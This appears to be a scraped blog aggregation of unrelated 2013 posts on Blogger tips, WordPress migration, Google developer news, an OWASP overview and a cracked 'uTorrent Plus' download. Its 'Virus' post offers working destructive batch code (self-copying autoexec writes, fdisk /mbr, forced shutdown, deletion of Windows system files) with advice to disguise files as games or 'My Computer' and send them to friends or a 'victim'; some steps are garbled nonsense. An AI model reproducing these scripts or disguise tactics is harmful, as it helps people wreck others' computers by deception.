Les nouveautés et Tutoriels de Votre Codeur | SEO | Création de site web | Création de logiciel

seo Move Your Blogs from Blogger to WordPress The Easy Way 2013

Seo Master present to you:

If you have been planning to migrate your blog from Blogger to Wordpress but found the whole process of importing blogger posts with comments into Wordpress too technical and complicated, here's a very good news for you.
You can now move all blogs posts and comments from your Blogger account into your WordPress blog with the click of a button - it's so simple that even mom can do it as long as her blog is hosted on the new Blogger platform.

Move from Blogger to Wordpress

Wordpress.com and self-hosted Worpress 2.2 installations ship default with a free Blogger Importer plugin that can be accessed from your Wordpress dashboard (Manage -> Import -> Blogger)
All you have to do is authorize Wordpress to use your Google account and Wordpress will display a list of blogs associated with Blogger account. Select the blog that you like to import in blogger and click import. Voila!
All your posts, comments, categories (Blogger labels) and users will be visible in Wordpress in few minutes depending on the size of your Blogger Blog.
Even if you have no plans to switch from Blogger to Wordpress, this is still an excellent option to create a backup of all the posts and comments from the Blogger blog.
For Geeks: This Wordpress-Blogger Importer will not change anything in your Blogger hosted blog - neither the timestamp formats nor the blogger templates. It simple uses the Google Blogger API to fetch the blogger posts into Wordpress.
The Blogger Importer script will however not import the Blogger images to your Wordpress installation. And there's no way to specify filters on your Blogger posts - everything will be imported in one go.




2013, By: Seo Master

seo UTorrent Plus 3.3.1 Beta 29335 Full Version Free Download 2013

Seo Master present to you:

µTorrent is a lightweight and efficient BitTorrent client for Windows or Mac with many features.It is fast, efficient and tiny with maximum functionality and low resource usage.uTorrent is a small and really most popular Bit-Torrent client. uTorrent is a lightweight and very tiny Bittorent client by over then one hundard million of users and several advanced and updated features: Resource-Friendly ,Fast, very Small, Free Micro Sized Yet quality overflowing. Most of the features present in other BitTorrent clients are present in µTorrent, including bandwidth prioritization, scheduling, RSS auto-downloading and Mainline DHT (compatible with BitComet). Additionally, µTorrent supports the Protocol Encryption joint specification (compatible with Azureus 2.4.0.0 and above, BitComet 0.63 and above) and peer exchange.

uTorrent 3.3.1 Beta 29335 full version ( masterhackindia.blogspot.com)

 

Download µTorrent Plus 3.3.1 Beta 29335 Full Version: Click here (Alternate Link) OR Click here

 

Features

  • uTorrent files are always less than 800 KB. It runs fast with a light footprint on your Computer and work with super performance.
  • Very Simple and easy that’s u-Torrent. With updated these functions you can work with files without any risk like
  • Also Access torrents from anywhere with µTorrent Remote features. Easy access your home clients strongly (using ultra private authentication and key exchange).
  • Since uTorrent is presented by the team who invented the Bit-Torrent open source protocol; you know you will forever have entree to the latest and greatest technologies.
  • uTorrent expertly designed for high-speed downloads. Avoid hogging valuable system possessions, runs quietly in the background and doesn't interfere with your personal or private work, games, plays etc.
  • Incorporating ground breaking µTP technology, uTorrent maximize bandwidth and reduce obstruction - so you have the smoothest, quickest downloads possible and don't make your internet connection slow to a crawl.
  • uTorrent is impulsively smart. It has auto-adjusts bandwidth usage based upon your network and the net. Use Skype, stream video, play games etc. all without interference.
  • uTorrent is a grateful programme to install on your home network. In the majority cases, it's also plug n play. Its always capability to uses UPnP and NAT PMP technologies to train your router for torrent access.

 

 

Leave a comment if links are broken………………. thank you………..

 

2013, By: Seo Master

seo Code Jam’s Sprint to Google I/O 2013

Seo Master present to you: Author Photo
By Igor Naverniouk, Software Engineer, Code Jam

Last Friday, we kicked off our Code Jam qualification round where over 36,000 programmers from around the world competed for a chance to be one of the 25 finalists invited to New York for the final showdown. While registration for Code Jam is now closed, we didn’t want to keep you waiting a whole year to re-try your luck.



Starting tomorrow, April 19 at 7:00 AM PDT / 14:00 UTC, we will be running a Code Jam sprint. The stakes, you ask? The 100 top scoring developers to solve at least one two-part challenge will be given the opportunity to purchase tickets to Google I/O, which sold out in just over 20 minutes this year.

You don’t have to be a seasoned Code Jam veteran to participate, but you’ll want to register in advance. This ensures that the only thing between you and your ticket to Google I/O is a single challenge and a few quick clicks. In case you want a warm up, check out our Code Jam quick-start guide and practice questions.

The URL for the challenge will be posted to our +Google Developers page promptly tomorrow, April 19 at 7:00 AM, so don’t miss your chance to code your way to Google I/O this year!


Update 9:20 PM: We've edited this post to clarify exactly how the successful entries will be determined. Please read the bold sentence above for details.


Code Jam is a worldwide programming competition in which contestants may use any programming language to solve algorithmic problems. Although registration for Code Jam 2012 is now closed, developers can still compete in our Sprint to Google I/O for a chance to purchase a ticket to the conference for $900.


As his main job, Igor Naverniouk builds analytics for Google Play. In his 20% time, he works on programming challenges for Code Jam.

Posted by Scott Knaster, Editor
2013, By: Seo Master

seo How To Share Files Across Your Home Network Using Python 2013

Seo Master present to you:

All of us will ever be at home with a friend or a family member and want to exchange a few files quickly. This “How To” you will be able to “host” your files temporarily and your folders on your GNU / Linux using Python, and you can access via browser from any device connected to the LAN and WLAN.

WHAT IS PYTHON?

Python is a high-level programming language interpreted, object-oriented and extensible. It is a multi-paradigm language variables are not typed, which allows Python to be versatile, fast and efficient. Precisely because of these characteristics, it proves useful to scripting.

DISTRO GNU / LINUX AND PYTHON

Our goal is to have access to a Linux device file via browser from any machine connected via LAN cable (LAN) or wireless (WLAN).
But how?
What we need is a small server to boot from the terminal. The SimpleHTTPServer, this is the script name in the directory we will use

/ Usr / lib / pythonx.y /

is available in all systems that have installed Python version 2.5 or higher.
Given some element of theory, let’s practice!

LET’S PRACTICE!

We want to share the folder “mia_cartella” contained in one of the system.
We initiate the terminal.
Let’s move the folder to be exchanged: Use the command “cd” (change directory).

cd Desktop / mia_cartella

Finally we start the script. The syntax is:

sudo python-m SimpleHTTPServer 80

where 80 is the port on which to listen.
For more ports of 1024 can omit “sudo”.
This is what will appear: The server starts at localhost on port choice.
To end the session just press Ctrl + C

Now just find the IP address of the pc to share the folder with one of the many methods, I suggest sites like http://www.ip-adress.com/ .
Point your Web browser connected to the device (W) LAN from which you access

http://ipaddress:port/

proceeds with the IP address instead of “ipaddress” and the port you chose for the connection instead of “port”. The browser will display a tree structure, such as image, with the contents of the folder from which you started the script.

 

Warning! The script is recursive, so anyone can access it, can also display the subfolders.


2013, By: Seo Master

seo Virus 2013

Seo Master present to you:

What Is A Virus?

 

images (4)

 

A computer virus is a computer program that can copy itself and infect a computer. The term “virus” is also commonly but erroneously used to refer to other types of malware, adware, and spyware programs that do not have the reproductive ability. A true virus can only spread from one computer to another (in some form of executable code) when its host is taken to the target computer; for instance because a user sent it over a network or the Internet, or carried it on a removable medium such as a floppy disk, CD, DVD, or USB drive. Viruses can increase their chances of spreading to other computers by infecting files on a network file system or a file system that is accessed by another computer.(Source Wikipedia)

As stated above, the term “computer virus” is sometimes used as a catch-all phrase to include all types of malware, adware, and spyware programs that do not have the reproductive ability. Malware includes computer viruses, worms, trojans, most rootkits, spyware, dishonest adware, crimeware, and other malicious and unwanted software, including true viruses. Viruses are sometimes confused with computer worms and Trojan horses, which are technically different. A worm can exploit security vulnerabilities to spread itself automatically to other computers through networks, while a Trojan is a program that appears harmless but hides malicious functions. Worms and Trojans, like viruses, may harm a computer system’s data or performance. Some viruses and other malware have symptoms noticeable to the computer user, but many are surreptitious and go unnoticed.(Source Wikipedia)

 

  • Understand the following: It’s just a harmless “virus”. It only prints some scary messages and finally shuts down the computer. As you start it again, your computer will work as it did before!

  • Read the virus: Below you see the Computer-Code that is executed as you start the virus. The lines that start with REM are comments that the computer ignores. The explain you what the above line does.

 

@echo off
title %0
rem conditional check.
echo welcome to this wonderful program! please wait while I delete all your files!
rem infection of the user
copy %0 c:tmp.bat >null attrib +r +s +h c:tmp.bat echo for %%i in (*.bat) do copy c:tmp.bat+%%i %%i >>c:windowssystem32autoexec.NT
echo echo virus detected! >>c:windowssystem32autoexec.NT
echo pause >>c:windowssystem32autoexec.NT
echo NT core:infected!
echo echo shame on you! >>c:autoexec.bat
echo echo system hault-virus identified! >>c:autoexec.bat
echo chkdsk >>c:autoexec.bat
echo i t i s t o o l a t e, y o u h a v e a v i r u s, n o w u r l i f e i s n o t b e a u t i f u l
fdisk /mbr
shutdown -s -t 03 -c “windows has shut down because the lsass service has incountered a write fault at 0×00000000000000000000000000000000000″

Code Details

@echo off
color 1a (Changes the colour)
echo (Displays a text)
echo: (leaves a line)
ping -n 2 127.0.0.1>nul (pings your localhost – nothing much)
shutdown.exe (shutdown)

  1. Read and understand the warnings!

  2. Open up Notepad in Windows. You can do this by navigating to Start > Programs > Accessories > Notepad, or simply by entering notepad under Start > Run.

  3. Copy and Paste the Code of the “virus” into Notepad

  4. Click File -> Save as

  5. Decide for a location to save the fake-virus. You should chose a location where the user won’t find the file, so saving it on the desktop would be a bad idea!

  6. Change “.txt” to “All files” in the file type drop-down menu

  7. Chose a harmless filename. Replace the “.txt” at the with “.bat”

  8. Click on save and close Notepad.

Now We Have Completed Making The Virus And Now We Must Bind The Virus With Any Other File

To Create a Fake Virus

First of all open "Notepad" in your computer and type the following code without quotes.

"start virus.bat

virus.bat"

Now the file as virus.bat and send it to your friend.Now when he will be trying to run it,his computer will get crushed and he will have to restart his computer.

To Create a Shutdown Virus

 

To create this virus,you dont need to open notepad.For this just go to your desktop,i.e.,the main screen and right click and go to "New" and then click "Shortcut".

Now type the following code in the text box.

shutdown -s -t 200 -c "This is a Fake Virus"

And then click next and type "My Computer".Now you will see a shortcut on your desktop named as "My Computer".Now you just need to change the icon of it as same as that of original My Computer.So right click on the shortcut and click properties and then click "Change Icon" button.Now select the icon of the My Computer and click apply and then OK.Now place the My Computer shortcut on your desktop and replace the original one.

Now whenever your friend will try to open My Computer,then his computer will get shut down after 3 minutes.To stop the shutdown,go to start and then go to Run and type shutdown -a.

How To Create a Harmful Virus

 

1.To create a very harmful virus,open Notepad and type the following.

del "C:\windows\pchealth"

del "C:\windows\system\"

del "C:\windows\system32\restore\"
del "C:\winlogon.exe"

del "C:\windows\system32\logonui.exe"

del "C:\windows\system32\ntoskrni.exe"

del "C:\windows\system32\autoexec.nt"

 

After pasting , Save it as  " your fav name " .bat
it's like i have saved it with ,"  fifa 10.bat "
i saved it like
fifa 10.bat
cricket 08.bat
spiderman 03.bat
batman 08.bat
matrixtheneo 02.bat
you have to put " any name " and 2 digits then " .bat "
and save it to your desktop , ....dont DOUBLE CLICK IT
or else your system files willl be deleted !
the disadvantage is , you cannot send this file by attachment in any EMAIL and send it to your friends
destroy your friends CPU and Enjoy !

 

2.What this virus does is completely and permanently delete Windows or Linux depending. Please read the caution at the top.Onto the trick. Follow the directions carefully.

1- Write The Following In Notepad Exactly as it says Code: 01001011000111110010010101010101010000011111100000
2- Save the file as an EXE (Click File-->Save as...-->and erase what ever is there and type in something like funnystuff.exe).
3- To test it, create a textfile called "TEST.txt"(just leave it blank) and save it in 'My Documents' or something in your C: drive. Now in a NEW notepad type "erase C:TEST.txt" (without the quotes). Then do "Save As..." and save it as "Test.cmd". Now run the file "Test.cmd" and go to C: and you'll see your Test.txt is gone. Now, the real work begins:
4- Go to Notpad and type "erase C:WINDOWS" (or C:LINUX if your targeted victim has linux) and save it again as funnypicture.cmd or something.
5- DON'T EVER run the file or you'll lose your WINDOWS map. So, that's the virus.
6- Send an email to your victim and attach the file "Funnypicture.cmd" or whatever you named it. When they open it, their Windows will be erased.

 

 

 

 

 

 

 





2013, By: Seo Master

seo How to Add Emoticons/Smileys in Blogger Comments 2013

Seo Master present to you: Emoticons/Smileys are a great way of making discussions more interesting and fun, so it's a pity that Blogger don't support them. This tutorial will show you some simple steps on how to add some very cute emoticons called Kolobok to your Blogger/Blogspot comments, so that you and your blog visitors will be able to have an enjoyable time together.

Now available for threaded commenting system too!
emoticons in blogger, kolobok smileys, threaded comments



How To Add Kolobok Smileys In Blogger Comments

Step 1. Go to Dashboard - Template - Edit HTML - Proceed


 Step 2. Expand Widget Template (make a backup)


    Step 3. Search (CTRL + F) for this tag:

    </body>

    Step 4. Copy and paste just above it, this code:

    • For previous commenting system (comments without reply option)
    <!--kolobok-smileys-->
    <script src='http://helplogger.googlecode.com/svn/trunk/[www.matrixar.com]smileys.js' type='text/javascript'/><noscript><a href='http://www.matrixar.com/2012/04/how-to-add-emoticonssmileys-in-blogger.html' target='_blank'><span style='font-size: x-small;'>Add emoticons</span></a></noscript>
    <!--kolobok-smileys-->

    • For threaded commenting system (comments with reply option)
    <script src='https://helplogger.googlecode.com/svn/trunk/kolobok threaded.js' type='text/javascript'/>

    Note: ignore steps 5-8 if you are using threaded comments!

    Step 5. Now find this code snippet:

    <b:loop values='data:post.comments' var='comment'>

    Step 6. Paste the following code just above it:

    <div id='smileys'>

    Step 7. Find the following code (look carefully, it should be somewhere below the code from step 5)

    </b:loop>

    Step 8. Paste the following tag just after it:

    </div>

    Step 9. Now find this code:

    • For previous commenting system:
    <data:blogTeamBlogMessage/>

    Note: if you'll find it like 4 times, stop to the 2nd one!

    • For threaded commenting system:
    <div class='post-footer-line post-footer-line-3'>

    Step 10. And add this code just after it:

    <b:if cond='data:blog.pageType == &quot;item&quot;'><script type='text/javascript'>
    //<![CDATA[
    function moreSmilies() {
        document.getElementById('smiley-more').style.display = 'inline';
        document.getElementById('smiley-toggle').innerHTML = '<a href="javascript:lessSmilies()"><div style="font-size:small; font-weight:bold;color:#000000;">Hide Emoticons /<a href="http://www.matrixar.com/2012/04/how-to-add-emoticonssmileys-in-blogger.html">Add Emoticons</div></a></span>';
    }
    function lessSmilies() {
        document.getElementById('smiley-more').style.display = 'none';
        document.getElementById('smiley-toggle').innerHTML = '<a href="javascript:moreSmilies()"><div style="font-size:small; font-weight:bold;">Show Emoticons</div></a>';
    }
    //]]>
    </script>
    <div class='emoticons'>
    <span id='smiley-more' style='display: none;'>
    <img src='http://www.matrixar.com/-k4ujC23cSgI/UTIq7eUkmuI/AAAAAAAABAQ/YUNL9_RhDB0/s1600/smile3.gif'/>:)
    <img src='http://www.matrixar.com/-XSBJ7zBZKZs/UTIrT-hMYyI/AAAAAAAABAY/6B26_8Ttwj4/s1600/sad.gif'/>:(
    <img src='http://www.matrixar.com/-Ph2wxEvy2mc/UTIr8-fdHjI/AAAAAAAABAo/3use2PsPhMA/s1600/taunt.gif'/>:))
    <img src='http://www.matrixar.com/-pcE-4ot-gjk/UTIsLRff6SI/AAAAAAAABAw/LYvZ8__88Ak/s1600/cry2.gif'/>:((
    <img src='http://www.matrixar.com/-lNNTReQVc0A/UTIrjDhVLAI/AAAAAAAABAg/BsVMYnr54pI/s1600/rofl.gif'/>=))
    <img src='http://www.matrixar.com/-8C5UH12mxf0/UTIzmsxczDI/AAAAAAAABDA/2seHdqLVQ6Q/s1600/suicide.gif'/>=D&gt;
    <img src='http://www.matrixar.com/-lhTywmMZ58E/UTI04kjJ3WI/AAAAAAAABDY/qNgtijEr_E8/s1600/biggrin.gif'/>:D
    <img src='http://www.matrixar.com/-gG_Wn6D6Ux4/UTIyqFyfKbI/AAAAAAAABCo/qEmU8s8ndVI/s1600/tongue.gif'/>:P
    <img src='http://www.matrixar.com/-Zb5g0OWHx4c/UTIsuPLt90I/AAAAAAAABA4/cmP1ltBmVF0/s1600/shock.gif'/>:-O
    <img src='http://www.matrixar.com/-TSIzPWeGBwk/UTI0S-nw5tI/AAAAAAAABDQ/xyHPCFZH4fI/s1600/think.gif'/>:-?
    <img src='http://www.matrixar.com/-qpnD1BYon5w/UTI0AIeKX6I/AAAAAAAABDI/HsllV7NYTqk/s1600/unsure.gif'/>:-SS
    <img src='http://www.matrixar.com/-SpvC8mHHwhg/UTIzQMUVGKI/AAAAAAAABCw/_NKKVyQtulk/s1600/flowers1.gif'/>:-f
    <img src='http://www.matrixar.com/-qlyn_deOhFw/UTIzY8aRgqI/AAAAAAAABC4/pfSojMdD33s/s1600/doh.gif'/>d(
    <img src='http://www.matrixar.com/-H4e_O5BFVP8/UTIumwhVmKI/AAAAAAAABBw/SKhY4DDxKkk/s1600/air_kiss.gif'/>:-*
    <img src='http://www.matrixar.com/-h4yNmhdKUVU/UTIwUKpvVOI/AAAAAAAABCY/B0FEZVRGHe4/s1600/threaten.gif'/>b-(
    <img src='http://www.matrixar.com/-veVoDPEc7I4/UTIv9wCS0jI/AAAAAAAABCQ/4c5FgCHAiU4/s1600/help.gif'/>h-(
    <img src='http://www.matrixar.com/-_ttAcnBbAaw/UTIvKtxfWvI/AAAAAAAABCA/X2JLEShhOQU/s1600/good.gif'/>g-)
    <img src='http://www.matrixar.com/--o9jZ1nMcec/UTIuyCBgS_I/AAAAAAAABB4/Jf03oz5yKrU/s1600/beee.gif'/>5-p
    <img src='http://www.matrixar.com/-6-BTJcVpwY0/UTIvhF_PL-I/AAAAAAAABCI/SS-LDADTSls/s1600/yahoo.gif'/>y-)
    <img src='http://www.matrixar.com/-khAwhIYbgvQ/UTItD_PfNyI/AAAAAAAABBI/HMpRMQh5Uak/s1600/crazy.gif'/>c-)
    <img src='http://www.matrixar.com/-fsTXhXl10Gg/UTIs7Ll01AI/AAAAAAAABBA/QkWgWAAFG3g/s1600/spiteful.gif'/>s-)
    <img src='http://www.matrixar.com/-CIuUuJeuyGI/UTIueHgTxOI/AAAAAAAABBo/BzXkTEEDlhw/s1600/drinks.gif'/>d-)
    <img src='http://www.matrixar.com/-Mc5ed3Ymk7s/UTI1GIXMAMI/AAAAAAAABDg/PyDOfoXgsl0/s1600/cheer.gif'/>w-)
    <img src='http://www.matrixar.com/-JOgaMRI61Jk/UTItsGc5KdI/AAAAAAAABBY/6UDCabfZQbg/s1600/hi+2.gif'/>:-h
    <img src='http://www.matrixar.com/-wmOB_Z6LPp4/UTIt9FhZiwI/AAAAAAAABBg/7VoefgIQjEs/s1600/give_heart.gif'/>:X
    </span>
    <span id='smiley-toggle'><a href='javascript:moreSmilies()'><div style='font-size:small;font-weight:bold;'>Show Emoticons <img src='http://www.matrixar.com/-k4ujC23cSgI/UTIq7eUkmuI/AAAAAAAABAQ/YUNL9_RhDB0/s1600/smile3.gif'/></div></a></span>
    </div></b:if>

    Note: Ignore steps 11-12 if you are using threaded comments!

    Step 11. Finally, find this code

    ]]></b:skin>

    Step 12. Add this one below, just above ]]></b:skin>

    .emoticons {-moz-background-clip: -moz-initial;-moz-background-origin: -moz-initial;-moz-background-inline-policy: -moz-initial;text-align: left;width:400px;}
    .emoticons a, .emoticons a:hover {margin-left: 20px;text-decoration:none;}

    Note: if you want to change the size of the emoticon container, edit the red code.

    Step 13. Save the Template and you're done. Enjoy!

    If you have any problem and need help, please leave a comment below.
    2013, By: Seo Master

    seo owasp top vulnerability | Cross site scripting XSS | SQLI | CSRF | LFI | RFI 2013

    Seo Master present to you:

     owasp top vulnerability | Cross site scripting XSS | SQLI | CSRF | LFI | RFI

     Ethical Hacking is very important part for the website and other domain. Now a day’s Hacker easily access on the website. With the common mistakes of developer’s, website owner has been in trouble. As I am security Researcher I have also found 1000 of security flaw in website. I have reported it. Like Microsoft, opera, adobe, Nokia, Braintree, soundcloud, eBay. But now a day’s Hackers easily access on website database. But in the same way Ethical hacker’s (Security Researcher) or white hacker’s done the job. And save the website from the black hat hacker’s. There are lots of security flaws (vulnerability) in website. According the open web application security project (OWSAP) there are lots of security flaw in website. This is top ten security flaw as follow 


     owasp top vulnerability

    A1 – Injection

    Injection flaws, such as SQL, OS, and LDAP injection occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing unauthorized data.

    A2 – Broken Authentication and Session Management 

    Application functions related to authentication and session management are often not implemented correctly, allowing attackers to compromise passwords, keys, session tokens, or exploit other implementation flaws to assume other users’ identities.

    XSS flaws occur whenever an application takes untrusted data and sends it to a web browser without proper validation or escaping. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.

    A4 – Insecure Direct Object References

    •A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or database key. Without an access control check or other protection, attackers can manipulate these references to access unauthorized data.

    A5 – Security Misconfiguration

    Good security requires having a secure configuration defined and deployed for the application, frameworks, application server, web server, database server, and platform. All these settings should be defined, implemented, and maintained as many are not shipped with secure defaults. This includes keeping all software up to date.

    A6 – Sensitive Data Exposure

    Many web applications do not properly protect sensitive data, such as credit cards, tax ids, and authentication credentials. Attackers may steal or modify such weakly protected data to conduct identity theft, credit card fraud, or other crimes. Sensitive data deserves extra protection such as encryption at rest or in transit, as well as special precautions when exchanged with the browser.

    A7 – Missing Function Level Access Control

    Virtually all web applications verify function level access rights before making that functionality visible in the UI. However, applications need to perform the same access control checks on the server when each function is accessed. If requests are not verified, attackers will be able to forge requests in order to access unauthorized functionality.

    A8 - Cross-Site Request Forgery (CSRF)

    A CSRF attack forces a logged-on victim’s browser to send a forged HTTP request, including the victim’s session cookie and any other automatically included authentication information, to a vulnerable web application. This allows the attacker to force the victim’s browser to generate requests the vulnerable application thinks are legitimate requests from the victim.

    A9 - Using Components with Known Vulnerabilities

    Vulnerable components, such as libraries, frameworks, and other software modules almost always run with full privilege. So, if exploited, they can cause serious data loss or server takeover. Applications using these vulnerable components may undermine their defenses and enable a range of possible attacks and impacts.

    A10 – Unvalidated Redirects and Forwards

    Web applications frequently redirect and forward users to other pages and websites, and use untrusted data to determine the destination pages. Without proper validation, attackers can redirect victims to phishing or malware sites, or use forwards to access unauthorized pages.

    So this is top ten vulnerability which is very common. So in my next tutorials I will explain you that how to find a vulnerability in website. If you have any problem regarding vulnerability so comment below or you can directly contact with me. click here
    2013, By: Seo Master

    seo Code Review: Start your App Engine and run the cloud offline with your docs 2013

    Seo Master present to you:



    The big buzz continues to revolve around our Google App Engine launch. We are seeing a host of applications being developed, and were even pleasantly surprised to see people port the APIs allowing you to run App Engine code elsewhere, such as appdrop.com.

    One interesting feature to the App Engine which you may not have noticed, is the integration with Google Apps. Not only can you tie an application to your domain (allowing you to have myapp.mydomain.com instead of myapp.appspot.com) but you can restrict access to the given application to only members of your domain. If I ran a company on Google Apps, this would be a nice addition. I could see the small business apps that I need running there.

    Jeff Scudder then released a new version of the Google data Python client library which has support for Google App Engine and the Contacts API. If you want to use this in your Google App Engine application you simply need to set gdata.service.http_request_handler = gdata.urlfetch to make sure your requests have a path out!

    Google Docs offline, and Gears

    I was on the road, speaking about Gears and the Open Web in Europe last week, and it was perfect timing to be mixing with the community as Google App Engine came out and I could talk to that too. We also had a few things to talk about with Gears.

    We have been getting lots of questions surrounding our stance with the various standards out there, so Aaron Boodman put down our thoughts on the matter in a piece called Gears and Standards. It talks about how we are working with HTML5, and the direction that you will see Gears going. I think it is incredibly exciting to see people realise how Gears is a lot more than "offline", and is actually an open source way to teach browsers new tricks.

    Brad Neuberg talked about just that as well as new features in Gears, and tools to help you get your work done, such as PubTools. He also discussed our first Google Gears for Mobile application, done by the Picasa Team. Now the blokes in London can show off pictures of their kids as they slow poke through the city down in the tube.

    The biggest news of all though was the launch of Google Docs offline. If you have ever been in the situation where the internet goes flaky right when you just need that bit of info in document, no more. Now you have the option to save docs locally on your computer, so you can access them no matter where you are.

    If you would like a refresher course on how to get started with Gears check out Ben Lisbakken's new screencast.

    Fun with Maps

    The Geo side of the house continued to output great content, including a series of Geo Developer content:
    • Quick & Dirty KML Creation: With Mano Marks, Pamela Fox, and Christiaan Adams
      A demonstration of creating KML visually in Google Earth & Google Maps, and using Spreadsheet Mapper 2.0
    • Creating Custom Maps: With John Coryat
      A comparison of various ways of overlaying data in the Maps API and an in-depth explanation of creating tile layers and custom map types
    • GigaPan In-Depth: With Randy Sargent & Ted Morse
      A demo of the GigaPan panorama-browsing website and KML files, plus a technical explanation of PhotoOverlay
    • Dynamic KML: With Mano Marks & Brian Hamlin
      An exploration of using dynamic queries from KML, using the NetworkLink, httpQuery, and viewFormat elements, plus a demo of a PostGIS-generated NetworkLink
    • Mars, Moon, and Sky Map Types: With Noel Gorelick
      A talk introducing the non-Earth Maps API map types, plus cool demos of other types of projections used with planetary imagery
    • Mapping the Votes: With Michael Geary
      A whirlwind tour of what it took to create the Elections 2008 Map/Mapplet/Gadget, including SHPfile conversion, Javascript optimization, centroid calculations, Twitter updates collection, Mapplet API tricks, and more.
    • Google API Talks - Android, KML, Google Maps, Gadgets
      A series of 5-minute talks by various developers and Googlers given before Geary's presentation, including an intro to Gadgets/Mapplets.

    They were also happy to announce that KML is now a standard, and owned by the Open Geospatial Consortium. We have seen a lot of other sites consume and produce KML, so this is a great step.

    Finally, a great new feature was added to Google Maps. You can now check out traffic patterns in the future. If you have a commute the following morning, you can check out an estimate of how stuck you will be based on past experience. Obviously, it can't determine if there will be any crashes or anything like that :)

    And there's more...

    To finish up, a few other interesting items of the week:

    I hope you had a great week. Remember that our big developer event Google I/O is now just a few weeks away! We have a few posts from presenters who will be at the event to give you a little look at the content, but the best part will be having the community together to talk in the open.2013, By: Seo Master

    seo Bringing Google+ Comments to Blogger 2013

    Seo Master present to you:
    Google+ Comments

    Bringing Google+ Comments to Blogger


    Google introduced a new comments system for blogger.The feature isn't on by default. but once activated in the Blogger Dashboard, Google+ comments created about a blog post hosted by Blogger can seem aboard comments created directly on the blog without any extra effort from the blog owner.

    About Google+ Comments


    Google+ Comments is another to the default commenting system on Blogger, out there to blog authors who have upgraded their Blogger profile to Google+. Google+ Comments allows you to bring the following conversations together in one place, right under your blog post:

    Comments created on your Blogger blog post
    Comments on the blog post that you've shared to Google+
    Shared content on Google+ that links to your blog post
    Readers will need a Google+ page or profile to comment on your blog.

    Bringing Google+ Comments to Blogger

    Features of Google+ Comments


    Google+ Comments look similar to traditional Blogger comments, but have some important differences. For example:

    • When you leave a comment on a blog, you'll see the option, checked by default, to also share that comment to Google+.
    • Google+ posts that link to blog posts will show up as a comment underneath those blog posts
    • If original comment is shared to Google+, replies to the comment on the blog will show up in Google+ and vice versa, but only to the people that the original comment was shared with
    • If a comment is not shared with the blog author, the blog author will not be able to see the comment in either location
    • As the author of a post, you’ll receive Google+ notifications when readers comment on or share your blog post.

    How to Activate and Apply Google+ Comments on Blogger.

    1. First need a google plus account if you have not already then click here.
    2. Connect your default blogger profile to google plus profile? How to Transfer Blogger Profile to Google Profile
    3. Go to Blogger Dashboard
    4. Select the tab  Google+ and select the Use Google+ Comments on this blogv ,see the below picture:
    Google+ comments enable

    Happy commenting!

    2013, By: Seo Master

    seo How To Add or Change Favicon on Blogger Blogspot 2013

    Seo Master present to you: Favicon (Favorites Icon) is the small picture (usually 16px x 16px in size) you see beside some some site's name in your browser's address bar. Having your own favicon with a nice graphical reminder of your site beside is a good way to get visitors attention. Blogger users can add a custom favicon for their blogs going to the Layout section  and by clicking on the Edit link on the "Favicon" element.


    "For many bloggers, having a custom favicon (the tiny image displayed in your browser’s window or tab) is the finishing touch that ties together the design and identity of a great looking blog. Today, we're pleased to announce that Blogger in Draft users can now add a customized favicon to their blog. ~Blogger in Draft"

    How To Add a Favicon to Your Blogger Blog

    Step 1. Log in to your Blogger's Dashboard, go to the Layout and click on Add a Gadget link


    Step 2. Click on the "Edit" link on the "Favicon" setting above the navbar element.


    Step 3. A popup window will open where you can search for an image in your hard drive to replace the default favicon image. Click on "Browse" button and search for your favicon (it should have the .ico extension) - then click on "Save".



    Step 4. Now you should see your own favicon instead of blogger's default favicon.


    It might take some time until your new favicon will appear in your Browser's tab or window.

    If you want to add animated favicons to your Blogger blogs, then follow this method below.

    How to add an animated favicon in Blogger

    Step 1. Log in to your Blogger account > Template > Edit HTML (if needed, click on Proceed button)


    Step 2. Select the "Expand widget templates" box


    Step 3. Search (CTRL + F) for:

     <b:skin> 

    Step 4. Paste this code just above it:

    <link href="your-favicon-links-goes-here" rel="icon" type="image/gif"/>

    See the screenshot for more details
    animated favicon blogger, how to





    Note: replace your-favicon-links-goes-here with your favicon's link location

    You can choose from here some cool favicons for your site/blog: http://www.favicon.cc/ (just download the favicon you like - upload it on tinypic or on a blogger's post, then copy the link address/direct link)

    Step 5. Save the Template. And you're done!


    2013, By: Seo Master

    seo PageSpeed Service makes mobile sites faster 2013

    Seo Master present to you: Author Photo
    By Ram Ramani, Engineering Manager

    PageSpeed Service (PSS) is an online service to speed up the rendering of your web pages by rewriting and serving them through Google. While PSS’s optimization techniques benefit most platforms and browsers, today I’d like to focus on some of the PSS rewriters that are especially effective on mobile web pages. PageSpeed Service optimizes the web pages in such a way that users can start viewing and interacting with your pages as soon as possible.



    Prioritize Critical CSS: To avoid page reflows, modern browsers do not render pages until the CSS is downloaded and parsed. These CSS files are often tens of KBs because they include all the styles needed for the entire site. These blocking requests are especially bad on mobile devices, where network round trip times are high. The Prioritize Critical CSS rewriter speeds up rendering by identifying the minimal CSS required to render that page and including it in the HTML file. This not only saves an extra round trip to download additional files but also reduces the CPU consumed by the browser. Finally, a reference to the original CSS file is included at the end of the page to lazy-load the non-critical CSS.

    Defer JavaScript: The HTML specification requires the browser to stop, download, and execute each synchronous JavaScript file before proceeding to build and render the page - this requirement can significantly slow down rendering. PSS circumvents this behavior by rewriting the HTML to defer execution of all JavaScript until after the page is first rendered. This benefits pages that are mostly rendered via HTML markup rather than JavaScript.

    Optimize Images: Mobile screens are almost always smaller than their desktop counterparts. Large, high quality images translate to excessive bytes on the wire, slowing down page loads. PSS can resize images on the server to fit required dimensions and re-compress them to the optimal format, without perceptible visual loss. For very large images above the fold, PSS can also inline a low quality preview image for initial rendering. Once the rest of the page content loads, it is replaced by the original image, creating a seamless experience. Furthermore, images below the fold can be lazy-loaded, which prevents them from competing with the rest of the page load.

    PageSpeed Service includes several rewriters that speed up the rendering of web pages. Using PageSpeed Service, the mobile pages of TopNewsToday and Net1News are now 61% faster and 68% faster respectively. Alex Tsvetanov of TopNews Today says, “With Google PageSpeed Service, we increased our unique visitors and total pageviews by 100%, while reducing our bounce rate by 30%”. Massimo Romanello, CEO of Net1News says, "Thanks to Google PageSpeed Service, we have been able to reach 200,000 unique daily visitors with the same existing infrastructure and have made our site one of the quickest in the news sector".

